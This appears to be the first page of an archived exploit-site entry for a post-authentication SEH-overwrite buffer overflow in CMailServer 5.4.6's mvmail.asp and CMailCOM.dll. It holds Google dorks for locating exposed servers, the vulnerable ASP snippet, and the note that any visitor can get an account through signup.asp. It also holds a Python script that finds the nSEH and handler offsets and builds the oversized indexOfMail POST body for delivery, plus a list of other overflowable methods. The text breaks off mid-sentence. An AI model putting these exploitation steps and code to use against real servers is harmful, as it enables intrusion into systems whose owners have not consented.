CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit
  Add date: 07/08/2008   Publishing date: 07/08/2008   Hits: 18
Total 4 pages, current page: 1
 
<?php
    /*
        CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite
proof of concept exploit

        by Nine:Situations:Group::bruiser

        our site: http://retrogod.altervista.org/

        software site: http://www.youngzsoft.net/cmailserver/

        Google dorks:
        intitle:"Mail Server CMailServer WebMail"
        intitle:"Mail Server CMailServer WebMail 5.4.6"

        Some notes:
        This server provides an IIS/webmail interface and a registered COM
component vulnerable to multiple buffer overflows, among them the
CMailCOM.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
        This class is called by various ASP scripts inside the main folder...
I found this clear vector, look at mvmail.asp, lines 25-35:

          ...
          Set objPOP3 = CreateObject("CMailCOM.POP3.1")
          objPOP3.Login Session("User"), Session("Pass")
          Session("LoginSuccess") = objPOP3.LoginSuccess
          If Session("LoginSuccess") = 1 Then
              set rs=Server.createobject("adodb.recordset")
              rs.open "mailfolder",Conn,1,3
              i = 0
              arrString = Split(Request("indexOfMail"), ";", -1, 1)
              While Len(arrString(i)) <> 0
                  strUID = arrString(i)
                  objPOP3.MoveToFolder strUID ' <---------------- bof
          ...

By attaching OllyDbg to the w3wp.exe worker process you will see the usual
dump with ECX and EIP owned, with a buffer of approximately 13000 chars.

        Exploitation is post-auth, but you can get a user account simply by
registering through the signup.asp page, which is enabled by default.
        calc.exe will run with NETWORK SERVICE privileges; check the task list.
Note that 4-5 failed exploit attempts may result in an IIS "Service
Unavailable" message, because rapid-fail protection takes the crashed
application pool offline (by default after 5 failures within 5 minutes).
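The crash described above (ECX and EIP owned with a buffer of about 13000 chars) is the point at which an SEH-overwrite exploit needs the exact offsets of nSEH and the handler pointer inside the buffer. What follows is an added example, in Python, written for this page; it is not the author's PHP exploit (which occupies the remaining pages of the original). It generates a cyclic pattern, maps a dword read from the debugger back to its offset in the buffer, and builds the indexOfMail POST body that carries the payload to mvmail.asp. The handler offset 2000 and the simulated dump are constructed stand-ins for a real OllyDbg crash; the trailing ';' is inferred from the Split/While loop in the ASP snippet, and the login/session handling is not shown.

```python
"""Added example (not the author's PHP exploit): locate the SEH/EIP offset in
the ~13000-char MoveToFolder buffer with a cyclic pattern, and build the
indexOfMail POST body that carries it to mvmail.asp."""
import string
import urllib.parse


def cyclic_pattern(length: int) -> str:
    """Metasploit-style pattern "Aa0Aa1Aa2...". Every 3-char triple is unique
    within the first 26*26*10*3 = 20280 chars, so any dword read from the
    crash dump of a 13000-char buffer maps to exactly one offset."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern: str, value) -> int:
    """Offset of a 4-byte value in the pattern, or -1 if absent.

    `value` is either the four ASCII chars or the dword as an int exactly as
    OllyDbg prints it (e.g. EIP=41326241). x86 is little-endian, so the int
    is turned back into the byte order it had inside the buffer."""
    if isinstance(value, int):
        needle = value.to_bytes(4, "little").decode("latin-1")
    else:
        needle = value
    return pattern.find(needle)


def simulate_seh_overwrite(pattern: str, handler_offset: int) -> dict:
    """Constructed stand-in for the debugger dump: an unbounded copy of the
    pattern runs over an SEH record whose handler pointer sits at
    `handler_offset`; nSEH is the dword immediately before it."""
    handler = int.from_bytes(
        pattern[handler_offset:handler_offset + 4].encode(), "little")
    nseh = int.from_bytes(
        pattern[handler_offset - 4:handler_offset].encode(), "little")
    return {"nseh": nseh, "handler": handler}


def locate_seh(pattern: str, dump: dict) -> tuple:
    """Turn the two dwords of an overwritten SEH record into buffer offsets
    (nSEH offset, handler offset). With a real crash, paste the values from
    OllyDbg's SEH chain window into `dump`."""
    return (pattern_offset(pattern, dump["nseh"]),
            pattern_offset(pattern, dump["handler"]))


def build_indexofmail_body(payload: str) -> str:
    """POST body for mvmail.asp. The script splits indexOfMail on ';' and
    passes every element to objPOP3.MoveToFolder; the trailing ';' yields an
    empty element so the `While Len(arrString(i)) <> 0` loop stops after the
    single oversized UID (assumption: the snippet elides the loop's end)."""
    return "indexOfMail=" + urllib.parse.quote(payload + ";", safe="")


if __name__ == "__main__":
    pattern = cyclic_pattern(13000)                # size the advisory reports
    dump = simulate_seh_overwrite(pattern, 2000)   # 2000 is a made-up offset
    print("nSEH at %d, handler at %d" % locate_seh(pattern, dump))
    print("EIP=%08X -> offset %d"
          % (dump["handler"], pattern_offset(pattern, dump["handler"])))
    print("POST body length:", len(build_indexofmail_body(pattern)))
```

Run it as a script to print the offsets for the constructed dump; against a real crash, replace the simulated dump with the two dwords from the SEH chain view and send the body returned by build_indexofmail_body with the cookie of a logged-in session. The 13000-char buffer is well inside the pattern's 20280-char unique range, so each dword resolves to a single offset; nSEH is always the four bytes before the handler, which is what a later version of the payload overwrites with the short jump.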

        Other attacks are possible; see a list of locally overflowable
        methods:
        CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
DeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
Note also that remotely there is some kind of validation (e.g. you cannot
have a username with a length of more than 4000 chars, which

 